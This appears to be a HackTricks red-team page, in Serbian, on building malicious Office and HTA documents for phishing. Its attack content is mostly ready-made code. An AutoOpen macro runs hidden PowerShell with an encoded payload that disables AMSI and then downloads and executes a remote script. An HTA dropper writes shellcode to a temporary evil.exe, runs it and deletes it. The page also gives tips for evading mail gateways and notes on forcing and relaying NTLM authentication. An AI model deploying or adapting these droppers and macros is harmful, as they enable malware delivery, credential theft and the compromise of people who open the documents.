hacktricks/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md

Fajlovi i Dokumenti za Ribarenje

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

• Da li radite u kompaniji za kibernetičku bezbednost? Želite li da vidite svoju kompaniju reklamiranu na HackTricks? ili želite da imate pristup najnovijoj verziji PEASS ili preuzmete HackTricks u PDF formatu? Proverite PLANOVE ZA PRETPLATU!
• Otkrijte Porodicu PEASS, našu kolekciju ekskluzivnih NFT-ova
• Nabavite zvanični PEASS & HackTricks swag
• Pridružite se 💬 Discord grupi ili telegram grupi ili pratite me na Twitteru 🐦@carlospolopm.
• Podelite svoje hakovanje trikove slanjem PR-ova hacktricks repozitorijumu i hacktricks-cloud repozitorijumu.

Office Dokumenti

Microsoft Word vrši validaciju podataka fajla pre otvaranja fajla. Validacija podataka se vrši u obliku identifikacije strukture podataka, u skladu sa OfficeOpenXML standardom. Ako dođe do bilo kakve greške tokom identifikacije strukture podataka, fajl koji se analizira neće biti otvoren.

Obično, Word fajlovi koji sadrže makroe koriste ekstenziju .docm. Međutim, moguće je preimenovati fajl promenom ekstenzije fajla i dalje zadržati sposobnosti izvršavanja makroa.
Na primer, RTF fajl ne podržava makroe, po dizajnu, ali DOCM fajl preimenovan u RTF će biti obrađen od strane Microsoft Word-a i biće sposoban za izvršavanje makroa.
Isti interni mehanizmi se primenjuju na sve softvere Microsoft Office paketa (Excel, PowerPoint itd.).

Možete koristiti sledeću komandu da proverite koje ekstenzije će biti izvršene od strane nekih Office programa:

assoc | findstr /i "word excel powerp"

Eksterni Učitavanje Slike

Idi na: Umetanje --> Brze delove --> Polje
Kategorije: Linkovi i Reference, Nazivi polja: includePicture, i Naziv fajla ili URL: http://<ip>/bilošta

Makroi Pozadinska Vrata

Moguće je koristiti makroe za pokretanje proizvoljnog koda iz dokumenta.

Autoload funkcije

Što su češći, to je veća verovatnoća da će ih AV otkriti.

• AutoOpen()
• Document_Open()

Primeri Koda Makroa

Sub AutoOpen()
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
End Sub

Sub AutoOpen()

Dim Shell As Object
Set Shell = CreateObject("wscript.shell")
Shell.Run "calc"

End Sub

Dim author As String
author = oWB.BuiltinDocumentProperties("Author")
With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-")
.StdIn.WriteLine author
.StdIn.WriteBlackLines 1

Dim proc As Object
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
proc.Create "powershell <beacon line generated>

Ručno uklanjanje metapodataka

Idite na File > Info > Inspect Document > Inspect Document, što će otvoriti Document Inspector. Kliknite na Inspect, a zatim na Remove All pored Document Properties and Personal Information.

Doc Ekstenzija

Kada završite, izaberite opciju Save as type, promenite format sa .docx na Word 97-2003 .doc.
Ovo uradite jer ne možete sačuvati makroe unutar .docx i postoji stigma oko ekstenzije sa makroima .docm (npr. ikona sličica ima veliko ! i neki web/email gateway ih potpuno blokiraju). Zbog toga je ovaj stariji .doc format najbolji kompromis.

Generatori zlonamernih makroa

• MacOS
• macphish
• Mythic Macro Generator

HTA Fajlovi

HTA je Windows program koji kombinuje HTML i skriptne jezike (kao što su VBScript i JScript). Generiše korisnički interfejs i izvršava se kao "potpuno pouzdana" aplikacija, bez ograničenja sigurnosnog modela pregledača.

HTA se izvršava pomoću mshta.exe, koji je obično instaliran zajedno sa Internet Explorerom, čineći mshta zavistan od IE-a. Dakle, ako je deinstaliran, HTA fajlovi neće moći da se izvrše.

<--! Basic HTA Execution -->
<html>
<head>
<title>Hello World</title>
</head>
<body>
<h2>Hello World</h2>
<p>This is an HTA...</p>
</body>

<script language="VBScript">
Function Pwn()
Set shell = CreateObject("wscript.Shell")
shell.run "calc"
End Function

Pwn
</script>
</html>

<--! Cobal Strike generated HTA without shellcode -->
<script language="VBScript">
Function var_func()
var_shellcode = "<shellcode>"

Dim var_obj
Set var_obj = CreateObject("Scripting.FileSystemObject")
Dim var_stream
Dim var_tempdir
Dim var_tempexe
Dim var_basedir
Set var_tempdir = var_obj.GetSpecialFolder(2)
var_basedir = var_tempdir & "\" & var_obj.GetTempName()
var_obj.CreateFolder(var_basedir)
var_tempexe = var_basedir & "\" & "evil.exe"
Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)
For i = 1 to Len(var_shellcode) Step 2
var_stream.Write Chr(CLng("&H" & Mid(var_shellcode,i,2)))
Next
var_stream.Close
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run var_tempexe, 0, true
var_obj.DeleteFile(var_tempexe)
var_obj.DeleteFolder(var_basedir)
End Function

var_func
self.close
</script>

Prisiljavanje NTLM autentikacije

Postoje nekoliko načina da se prisili NTLM autentikacija "na daljinu", na primer, možete dodati nevidljive slike u e-poštu ili HTML koje će korisnik pristupiti (čak i HTTP MitM?). Ili poslati žrtvi adresu datoteka koje će pokrenuti autentikaciju samo za otvaranje fascikle.

Proverite ove ideje i još mnogo toga na sledećim stranicama:

{% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %} printers-spooler-service-abuse.md {% endcontent-ref %}

{% content-ref url="../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md" %} places-to-steal-ntlm-creds.md {% endcontent-ref %}

NTLM Prenos

Ne zaboravite da ne samo da možete ukrasti heš ili autentikaciju već i izvršiti napade prenosa NTLM-a:

• Napadi prenosa NTLM-a
• AD CS ESC8 (NTLM prenos na sertifikate)

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

• Da li radite u kompaniji za kibernetičku bezbednost? Želite li da vidite svoju kompaniju reklamiranu na HackTricks? ili želite da imate pristup najnovijoj verziji PEASS ili preuzmete HackTricks u PDF formatu? Proverite PLANOVE ZA PRIJAVU!
• Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
• Nabavite zvanični PEASS & HackTricks swag
• Pridružite se 💬 Discord grupi](https://discord.gg/hRep4RUj7f) ili telegram grupi](https://t.me/peass) ili me pratite na Twitteru 🐦@carlospolopm.
• Podelite svoje hakovanje trikove slanjem PR-ova na hacktricks repozitorijum i hacktricks-cloud repozitorijum.